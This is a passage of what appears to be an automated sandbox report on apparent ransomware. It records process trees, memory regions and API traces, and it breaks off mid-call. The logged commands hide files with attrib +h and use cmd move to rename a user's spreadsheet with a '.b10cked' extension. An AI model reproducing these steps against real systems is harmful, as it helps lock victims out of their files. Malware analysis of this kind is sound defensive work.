"c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16680" os_pid = "0x69c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0x910" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10933 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10934 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10935 start_va = 0x40000 end_va = 
0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10936 start_va = 0x70000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 10937 start_va = 0x380000 end_va = 0x386fff entry_point = 0x380000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 10938 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10939 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10940 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10941 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 10942 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10943 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10944 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10945 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 10946 start_va = 0x1c0000 end_va = 0x226fff entry_point = 0x1c0000 region_type = mapped_file name = "locale.nls" filename = 
"\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10947 start_va = 0x520000 end_va = 0x52ffff entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 10948 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 10949 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10950 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10951 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 10952 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10953 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10954 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10955 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = 
"\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 10956 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 10957 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10958 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 10959 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 10960 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 10961 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 10962 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 147 os_tid = 0x720 Process: id = "91" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16680" os_pid = "0x510" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "88" os_parent_pid = "0x910" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = 
"CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11073 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11074 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11075 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11076 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 11077 start_va = 0xff0000 end_va = 0xff6fff entry_point = 0xff0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11078 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11079 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11080 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11081 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 11082 start_va = 
0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11083 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11084 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11085 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11086 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 11087 start_va = 0x500000 end_va = 0x50ffff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 11088 start_va = 0x6e2b0000 end_va = 0x6e2ccfff entry_point = 0x6e2b0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11089 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11090 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11091 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11092 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = 
"\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11093 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11094 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11095 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11096 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11097 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11098 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11099 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11100 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 11101 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") 
Region: id = 11102 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 148 os_tid = 0x670 Process: id = "92" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16740" os_pid = "0x7b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\7JMXGW~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\7jmxgwY9.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11121 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11122 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11123 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11124 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 11125 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11126 start_va = 0x77230000 end_va 
= 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11127 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11128 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11129 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 11130 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11151 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11152 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11153 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11154 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 11155 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 11156 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 11157 start_va = 0x75540000 end_va = 0x75589fff 
entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11158 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11159 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11160 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11161 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11162 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11163 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11164 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11165 start_va = 0x460000 end_va = 0x527fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 11166 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11167 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 11168 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 11169 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 11170 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 11171 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 11172 start_va = 0x530000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 11173 start_va = 0x640000 end_va = 0x123ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000640000" filename = "" Region: id = 11174 start_va = 0x1240000 end_va = 0x13a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001240000" filename = "" Thread: id = 149 os_tid = 0x7dc [0129.370] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26f7dc | out: lpSystemTimeAsFileTime=0x26f7dc*(dwLowDateTime=0x870ba120, dwHighDateTime=0x1d440a9)) [0129.370] GetCurrentProcessId () returned 0x7b8 [0129.370] GetCurrentThreadId () returned 0x7dc [0129.370] GetTickCount () returned 0x29645 [0129.370] QueryPerformanceCounter (in: lpPerformanceCount=0x26f7d4 | out: lpPerformanceCount=0x26f7d4*=18615899517) returned 1 [0129.370] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0129.370] __set_app_type (_Type=0x1) [0129.370] __p__fmode () returned 0x76b331f4 
[0129.370] __p__commode () returned 0x76b331fc [0129.370] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0129.371] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0129.371] GetCurrentThreadId () returned 0x7dc [0129.371] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7dc) returned 0x38 [0129.371] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0129.371] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0129.371] SetThreadUILanguage (LangId=0x0) returned 0x409 [0129.371] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0129.371] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f76c | out: phkResult=0x26f76c*=0x0) returned 0x2 [0129.371] VirtualQuery (in: lpAddress=0x26f7a3, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x26f000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x171000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x171000, AllocationBase=0x170000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x173000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x173000, AllocationBase=0x170000, AllocationProtect=0x4, 
RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0129.371] VirtualQuery (in: lpAddress=0x270000, lpBuffer=0x26f73c, dwLength=0x1c | out: lpBuffer=0x26f73c*(BaseAddress=0x270000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x30000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0129.371] GetConsoleOutputCP () returned 0x1b5 [0129.371] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0129.371] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0129.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.372] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0129.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.372] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0129.372] _get_osfhandle (_FileHandle=1) returned 0x7 [0129.372] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0129.372] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.372] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0129.372] _get_osfhandle (_FileHandle=0) returned 0x3 [0129.372] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0129.372] GetEnvironmentStringsW () returned 0x2b0168* [0129.372] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0129.373] GetEnvironmentStringsW () returned 0x2b0168* [0129.373] FreeEnvironmentStringsW (penv=0x2b0168) returned 1 [0129.373] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6dc | out: phkResult=0x26e6dc*=0x40) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x90, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, 
lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x0, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegCloseKey (hKey=0x40) returned 0x0 [0129.373] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x26e6dc | out: phkResult=0x26e6dc*=0x40) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x40, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x26e6e4, 
lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x0, lpData=0x26e6e8*=0x1, lpcbData=0x26e6e0*=0x1000) returned 0x2 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x0, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x9, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26e6e4, lpData=0x26e6e8, lpcbData=0x26e6e0*=0x1000 | out: lpType=0x26e6e4*=0x4, lpData=0x26e6e8*=0x9, lpcbData=0x26e6e0*=0x4) returned 0x0 [0129.373] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", 